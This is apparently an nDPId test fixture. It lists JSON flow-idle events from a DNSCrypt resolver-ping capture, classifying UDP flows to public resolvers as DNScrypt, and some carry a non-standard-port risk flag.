-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396069,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337218,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396107,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337186,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317825,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391306,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337190,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
